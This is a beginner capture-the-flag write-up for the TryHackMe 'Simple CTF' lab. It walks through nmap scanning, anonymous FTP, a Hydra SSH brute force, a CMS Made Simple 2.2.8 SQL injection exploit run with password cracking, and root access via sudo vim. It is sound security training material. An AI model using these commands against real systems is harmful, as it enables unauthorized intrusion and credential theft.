Simple CTF - writeup by sahildari

This Simple CTF is created by . Kudos to this guy for creating this beginner level CTF!

 Follow along with we and join the room - https://tryhackme.com/room/easyctf

Questions:

 

 

 

 

 

 

 

 

 

Solution phase:

NMAP AGGRESSIVE SCAN

The very first thing I did was a nmap aggressive scan. The reason being for performing a aggressive scan is that we can get as much as information possible regarding the ports and the services running on our target machine.

nmap -A -p- -T4 -oN nmapinitial 10.10.36.207

Our nmap scan shows that we have total 3 ports open .i.e. 21(FTP), 80(HTTP) and 2222(SSH).

Our nmap scan gives the answers for the first two Questions #1 and #2.

As nmap scan tells that ftp allows anonymous login

ftp machine_IP

 

The file we got from anonymous ftp is Formitch.txt

cat ForMitch.txt

So, we know that there may be a user Mitch for which the password is very weak. That's intersting!

Hydra will do the password cracking for us.

hydra -l mitch -P /usr/share/dirb/wordlists/others/best110.txt ssh://machine_IP:2222

This will help us answer the Question #5.

We will now see the web application that is running on the port 80(HTTP). For that we will navigate to the machine IP and we are provided with the default Apache page!

From here we will use gobuster and/or dirbuster to find the available directories.

gobuster dir -u http://machine_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -o gobuster.log
 

gobuster found the /simple directory in the web application. On navigating to the /simple directory in the web application we found CMSMade simple running.

CMS Made Simple version is 2.2.8 

  

Using searchsploit to search for the available exploits for CMS Made Simple 2.2.8 

searchsploit CMS made simple 2.2.8 

 

To answer the Question #3 we will execute this command searchsploit 46635 --examine | grep CVE

 

So we have found the exploit, let's try to execute it. We will copy the exploit to our directory and name it sqli.py and execute the exploit. 

 

python sqli.py -u http://machine_IP/simple --crack -w /usr/share/dirb/wordlists/others/best110.txt
 

  

Running the exploit may or may not give error that termcolor is not found we can rectify the error by using the command pip install termcolor

Now after running the exploit we will get the username and password as follows:

The answer to Question #6 will be obvious, that we can login to ssh with details found. 

ssh mitch@machine_IP -p 2222

We have logged in with Mitch's credentials. I'll change the shell here for my convenience with the command bash -i 

 

we have found the user flag and will be the answer to the Question #7.

To anwer the next Question .i.e. #8 we will navigate to /home directory to see the other user

cd /home && ls

 

We are walking towards the end of this CTF and we have only two questions left. So for our second last question .i.e. Question #9 we will use command sudo -l to view if there is something we can run as sudo

 

Great news, we can run vim with root privileges we just have to open vim and execute commands in the shell we will spawn in vim and our commands will be executed as root.

After that we get the root shell to the machine.

I hope you learnt something new with this writeup. 

Happy Hunting